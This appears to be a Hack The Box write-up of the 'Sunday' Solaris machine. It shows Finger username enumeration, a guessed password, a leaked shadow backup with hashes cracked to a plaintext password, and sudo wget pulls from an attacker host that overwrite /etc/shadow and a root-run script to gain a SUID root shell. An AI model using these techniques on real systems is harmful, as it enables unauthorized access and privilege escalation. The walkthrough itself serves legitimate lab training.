Getting Initial is by gathering usernames from Finger service and gusesing the password gives use user shell and We need to find backup shadow file to get user sammy’s password and privilege escalation is by SUID.
Let’s Begin with our Initial Nmap Scan.
Nmap Scan Results
PORT STATE SERVICE VERSION 79/tcp open finger 111/tcp open rpcbind 2-4 (RPC #100000) 22022/tcp open ssh SunSSH 1.3 (protocol 2.0) | ssh-hostkey: | 1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA) |_ 1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
What is Finger?
A finger service is running on this host. The finger protocol is used to find out information about users on a remote system. Finger servers can usually provide either a list of logged-in users or detailed information on a single user.
I just downloaded finger-user-enum tool from Github.
Here we can see a lot of usernames and only a few have pts and others are TTY
PTS connections are SSH connections
TTY are direct connections to the computer like reverse shell something.
Getting User Shell
If I tried to login normally, it throws me some error and after adding this argument it worked perfectly. So I tried some default creds and I used the box name as password and Im logged in.
sunny : sunday
Getting Sammy User Shell
The first thing I did is
sudo -l and it shows me a binary located in root directory but I can’t examine much of it.
sunny@sunday:~$ sudo -l User sunny may run the following commands on this host: (root) NOPASSWD: /root/troll sunny@sunday:~$ sudo /root/troll testing uid=0(root) gid=0(root)
While checking through all the folders there is
shadow.backup file in
/backup directory and I got sammy user hash.
sunny@sunday:/$ ls backup boot dev etc home lib media net platform root sbin tmp var bin cdrom devices export kernel lost+found mnt opt proc rpool system usr sunny@sunday:/$ cd backup/ sunny@sunday:/backup$ ls agent22.backup shadow.backup sunny@sunday:/backup$ cat shadow.backup mysql:NP::::::: openldap:*LK*::::::: webservd:*LK*::::::: postgres:NP::::::: svctag:*LK*:6445:::::: nobody:*LK*:6445:::::: noaccess:*LK*:6445:::::: nobody4:*LK*:6445:::::: sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445:::::: sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
Cracked that using john and the password is
Tried to ssh with
sammy : cooldude! and Im logged in.
root@kali:~/CTF/HTB/Boxes/Sunday# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 email@example.com -p 22022 Password: Last login: Tue Apr 24 12:57:03 2018 from 10.10.14.4 Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008 sammy@sunday:~$ whoami sammy sammy@sunday:~$
Uploaded my enumeration script and it reveals me that
sudo -l and it seems I can run
wget as root without any password.
So I just created a hash using openssl
root@kali:~/CTF/HTB/Boxes/Sunday# openssl passwd -1 Password: Verifying - Password: $1$9O207kaB$1arg8TyVn3Wuva8gQs.br1
And I copied my shadow file and changed the hash with the one I created.
Now I tried to overwrite the older one with mine and we need to mention
-O in wget for the filename, otherwise it will be saved as
shadow1 since there is already a file that exists on that name.
sammy@sunday:/etc$ sudo /usr/bin/wget http://10.10.14.20:8000/shadow -O shadow --14:33:07-- http://10.10.14.20:8000/shadow => `shadow' Connecting to 10.10.14.20:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 1,009 [application/octet-stream] 100%[=============================================================>] 1,009 --.--K/s 14:33:08 (169.98 MB/s) - `shadow' saved [1009/1009] sammy@sunday:/etc$ su root Password: su: Password for user 'root' has expired New Password: Re-enter new Password: su: password successfully changed for root sammy@sunday:/etc# su root sammy@sunday:/etc# whoami root
Now I can do su to root with the new password. And here it says root password is expired and it asked for a new password so I just entered a new password and Im logged in.
We know there is a binary called
troll which is located in
/root directory and user sunny have permission to run that as root without any password, So I just made a small bash script that will copy the bash from
/usr/bash and paste it in /tmp directory and make it SUID.
sammy@sunday:/root# sudo /usr/bin/wget http://10.10.14.20:8000/troll -O /root/troll --15:20:12-- http://10.10.14.20:8000/troll => `/root/troll' Connecting to 10.10.14.20:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 61 [application/octet-stream] 100%[=======================================================================>] 61 --.--K/s 15:20:13 (14.32 MB/s) - `/root/troll' saved [61/61]
Using wget I just replaced the older one, And we need to be quick here because there is some sort of cron running that replaces the file as fast as possible.
When I executed the binary it created the bash with SUID and I need to mention -p while running it because -p mentions run it as an effective user ID which is root.
sunny@sunday:/tmp$ sudo /root/troll sunny@sunday:/tmp$ ls bash ogl_select254 sunny@sunday:/tmp$ ./bash -p bash-3.2# whoami root bash-3.2#
We own the box